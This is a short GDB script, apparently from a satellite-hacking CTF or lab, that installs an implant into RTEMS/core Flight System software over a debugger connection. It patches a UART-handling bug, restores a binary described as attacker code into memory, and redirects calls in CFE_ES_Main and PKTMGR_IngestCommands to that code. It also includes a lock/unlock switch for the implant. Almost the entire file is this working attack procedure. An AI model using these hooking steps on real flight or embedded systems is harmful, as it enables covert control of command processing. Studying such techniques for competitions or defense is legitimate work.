# Usage: gdb-multiarch -q -ex 'target remote 127.0.0.1:1234' -ex 'file core-cpu3.exe' -ex 'source gdbpython/__init__.py' -ex 'rtems rtlobj' -ex 'rtems loadsymbols run' -ex 'source load_implant.gdbscript'

# Patch the bug that occurs in uart_to_ci.obj when a short message is received (size <= 3 bytes)
# Change
#     00010b78  0a bf ff 9b   bcs LAB_000109e4
# to:
#     00010b78  0c bf ff 9b   bneg LAB_000109e4
set *(unsigned char*)(alignSyncWord + 444) = 0xc

# "Restore" the file that contains the attacker code
restore dump_verified.bin binary 0x42800000

# Set-up hooks
# original: 0x4000b6c4 <CFE_ES_Main+672>: 0x7fffded4 (call  0x40003214 <CFE_ES_WriteToSysLog>)
# patched: 0x4000b6c4 <CFE_ES_Main+672>: 0x409fd256 (call  0x4280001c)
x/wx 0x4000b6c4
set *(unsigned int *)0x4000b6c4 = 0x409fd256
x/wx 0x4000b6c4

# x/i PKTMGR_IngestCommands + 0x5e4
# original: 0x4100024c <PKTMGR_IngestCommands+1508>: 0x7fc053ab (call  0x400150f8 <CFE_SB_SendMsg>)
# patched: 0x4100024c <PKTMGR_IngestCommands+1508>: 0x405fff79 (call  0x42800030)
x/wx PKTMGR_IngestCommands + 0x5e4
set *(unsigned int *)(PKTMGR_IngestCommands + 0x5e4) = (0x42800038 + (-0x5ec - (int)PKTMGR_IngestCommands)) >> 2 | 0x40000000
x/wx PKTMGR_IngestCommands + 0x5e4

# Set the implant in a "locked" state
set *(unsigned int)0x42800038 = 0

# To unlock the implant:
# set *(unsigned int)0x42800038 = 1
